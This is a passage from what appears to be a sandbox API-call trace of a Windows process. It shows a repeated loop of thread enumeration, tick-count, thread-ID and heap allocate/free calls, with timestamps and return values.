lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.346] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.347] GetTickCount () returned 0xf519 [0191.347] GetCurrentThreadId () returned 0x66c [0191.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.348] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.349] GetTickCount () returned 0xf519 [0191.349] GetCurrentThreadId () returned 0x66c [0191.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.350] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.351] GetTickCount () returned 0xf519 [0191.351] GetCurrentThreadId () returned 0x66c [0191.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.351] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.353] GetTickCount () returned 0xf519 [0191.353] GetCurrentThreadId () returned 0x66c [0191.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.354] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.355] GetTickCount () returned 0xf519 [0191.355] GetCurrentThreadId () returned 0x66c [0191.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.356] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.358] GetTickCount () returned 0xf519 [0191.358] GetCurrentThreadId () returned 0x66c [0191.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.358] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.360] GetTickCount () returned 0xf519 [0191.360] GetCurrentThreadId () returned 0x66c [0191.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.360] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.362] GetTickCount () returned 0xf528 [0191.362] GetCurrentThreadId () returned 0x66c [0191.362] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.363] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.364] GetTickCount () returned 0xf528 [0191.364] GetCurrentThreadId () returned 0x66c [0191.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.364] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.365] GetTickCount () returned 0xf528 [0191.365] GetCurrentThreadId () returned 0x66c [0191.365] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.366] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.367] GetTickCount () returned 0xf528 [0191.367] GetCurrentThreadId () returned 0x66c [0191.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.367] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.369] GetTickCount () returned 0xf528 [0191.369] GetCurrentThreadId () returned 0x66c [0191.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.369] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.371] GetTickCount () returned 0xf528 [0191.371] GetCurrentThreadId () returned 0x66c [0191.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.371] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.373] GetTickCount () returned 0xf528 [0191.373] GetCurrentThreadId () returned 0x66c [0191.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.373] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.375] GetTickCount () returned 0xf528 [0191.375] GetCurrentThreadId () returned 0x66c [0191.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.375] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.376] GetTickCount () returned 0xf528 [0191.376] GetCurrentThreadId () returned 0x66c [0191.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.377] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.378] GetTickCount () returned 0xf538 [0191.378] GetCurrentThreadId () returned 0x66c [0191.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.378] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.380] GetTickCount () returned 0xf538 [0191.380] GetCurrentThreadId () returned 0x66c [0191.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.380] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.382] GetTickCount () returned 0xf538 [0191.382] GetCurrentThreadId () returned 0x66c [0191.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.382] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.383] GetTickCount () returned 0xf538 [0191.384] GetCurrentThreadId () returned 0x66c [0191.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.384] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.385] GetTickCount () returned 0xf538 [0191.385] GetCurrentThreadId () returned 0x66c [0191.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.386] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.387] GetTickCount () returned 0xf538 [0191.387] GetCurrentThreadId () returned 0x66c [0191.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.387] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.388] GetTickCount () returned 0xf538 [0191.388] GetCurrentThreadId () returned 0x66c [0191.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.389] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.390] GetTickCount () returned 0xf538 [0191.390] GetCurrentThreadId () returned 0x66c [0191.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.390] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.391] GetTickCount () returned 0xf538 [0191.391] GetCurrentThreadId () returned 0x66c [0191.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.392] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.393] GetTickCount () returned 0xf548 [0191.393] GetCurrentThreadId () returned 0x66c [0191.393] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.394] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.395] GetTickCount () returned 0xf548 [0191.395] GetCurrentThreadId () returned 0x66c [0191.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.395] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.396] GetTickCount () returned 0xf548 [0191.396] GetCurrentThreadId () returned 0x66c [0191.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.397] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.398] GetTickCount () returned 0xf548 [0191.398] GetCurrentThreadId () returned 0x66c [0191.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.398] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.399] GetTickCount () returned 0xf548 [0191.399] GetCurrentThreadId () returned 0x66c [0191.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.400] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.401] GetTickCount () returned 0xf548 [0191.401] GetCurrentThreadId () returned 0x66c [0191.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.402] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.403] GetTickCount () returned 0xf548 [0191.403] GetCurrentThreadId () returned 0x66c [0191.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.403] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.404] GetTickCount () returned 0xf548 [0191.404] GetCurrentThreadId () returned 0x66c [0191.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.404] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.405] GetTickCount () returned 0xf548 [0191.405] GetCurrentThreadId () returned 0x66c [0191.405] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.406] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.407] GetTickCount () returned 0xf548 [0191.407] GetCurrentThreadId () returned 0x66c [0191.407] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.407] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.407] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.415] GetTickCount () returned 0xf557 [0191.415] GetCurrentThreadId () returned 0x66c [0191.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.416] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.417] GetTickCount () returned 0xf557 [0191.417] GetCurrentThreadId () returned 0x66c [0191.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.418] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.419] GetTickCount () returned 0xf557 [0191.419] GetCurrentThreadId () returned 0x66c [0191.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.419] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.420] GetTickCount () returned 0xf557 [0191.421] GetCurrentThreadId () returned 0x66c [0191.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.421] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.422] GetTickCount () returned 0xf557 [0191.422] GetCurrentThreadId () returned 0x66c [0191.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.423] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.424] GetTickCount () returned 0xf557 [0191.424] GetCurrentThreadId () returned 0x66c [0191.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.424] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.426] GetTickCount () returned 0xf567 [0191.426] GetCurrentThreadId () returned 0x66c [0191.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.426] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.428] GetTickCount () returned 0xf567 [0191.428] GetCurrentThreadId () returned 0x66c [0191.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.428] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.429] GetTickCount () returned 0xf567 [0191.429] GetCurrentThreadId () returned 0x66c [0191.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.430] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.431] GetTickCount () returned 0xf567 [0191.431] GetCurrentThreadId () returned 0x66c [0191.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.432] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.433] GetTickCount () returned 0xf567 [0191.433] GetCurrentThreadId () returned 0x66c [0191.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.433] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.434] GetTickCount () returned 0xf567 [0191.434] GetCurrentThreadId () returned 0x66c [0191.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.435] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.436] GetTickCount () returned 0xf567 [0191.436] GetCurrentThreadId () returned 0x66c [0191.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.436] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.437] GetTickCount () returned 0xf567 [0191.437] GetCurrentThreadId () returned 0x66c [0191.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.438] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.439] GetTickCount () returned 0xf567 [0191.439] GetCurrentThreadId () returned 0x66c [0191.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.439] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.441] GetTickCount () returned 0xf576 [0191.441] GetCurrentThreadId () returned 0x66c [0191.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.441] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.442] GetTickCount () returned 0xf576 [0191.442] GetCurrentThreadId () returned 0x66c [0191.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.443] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.443] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.444] GetTickCount () returned 0xf576 [0191.444] GetCurrentThreadId () returned 0x66c [0191.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.444] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.445] GetTickCount () returned 0xf576 [0191.445] GetCurrentThreadId () returned 0x66c [0191.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.447] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.447] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.448] GetTickCount () returned 0xf576 [0191.448] GetCurrentThreadId () returned 0x66c [0191.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.449] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.450] GetTickCount () returned 0xf576 [0191.450] GetCurrentThreadId () returned 0x66c [0191.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.451] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.452] GetTickCount () returned 0xf576 [0191.452] GetCurrentThreadId () returned 0x66c [0191.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.452] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.454] GetTickCount () returned 0xf576 [0191.454] GetCurrentThreadId () returned 0x66c [0191.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.454] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.456] GetTickCount () returned 0xf586 [0191.456] GetCurrentThreadId () returned 0x66c [0191.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.456] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.457] GetTickCount () returned 0xf586 [0191.457] GetCurrentThreadId () returned 0x66c [0191.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.458] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.459] GetTickCount () returned 0xf586 [0191.459] GetCurrentThreadId () returned 0x66c [0191.459] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.460] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.461] GetTickCount () returned 0xf586 [0191.461] GetCurrentThreadId () returned 0x66c [0191.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.461] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.463] GetTickCount () returned 0xf586 [0191.463] GetCurrentThreadId () returned 0x66c [0191.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.463] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.464] GetTickCount () returned 0xf586 [0191.465] GetCurrentThreadId () returned 0x66c [0191.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.465] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.466] GetTickCount () returned 0xf586 [0191.466] GetCurrentThreadId () returned 0x66c [0191.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.467] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.468] GetTickCount () returned 0xf586 [0191.468] GetCurrentThreadId () returned 0x66c [0191.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.469] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.470] GetTickCount () returned 0xf586 [0191.470] GetCurrentThreadId () returned 0x66c [0191.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.470] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.472] GetTickCount () returned 0xf596 [0191.472] GetCurrentThreadId () returned 0x66c [0191.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.472] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.474] GetTickCount () returned 0xf596 [0191.474] GetCurrentThreadId () returned 0x66c [0191.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.474] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.476] GetTickCount () returned 0xf596 [0191.476] GetCurrentThreadId () returned 0x66c [0191.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.476] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.477] GetTickCount () returned 0xf596 [0191.477] GetCurrentThreadId () returned 0x66c [0191.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.478] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.479] GetTickCount () returned 0xf596 [0191.479] GetCurrentThreadId () returned 0x66c [0191.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.480] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.481] GetTickCount () returned 0xf596 [0191.481] GetCurrentThreadId () returned 0x66c [0191.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.482] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.483] GetTickCount () returned 0xf596 [0191.483] GetCurrentThreadId () returned 0x66c [0191.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.483] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.485] GetTickCount () returned 0xf596 [0191.485] GetCurrentThreadId () returned 0x66c [0191.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.485] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.487] GetTickCount () returned 0xf5a5 [0191.487] GetCurrentThreadId () returned 0x66c [0191.487] RtlAllocateHeap (HeapHandle=0x620000, 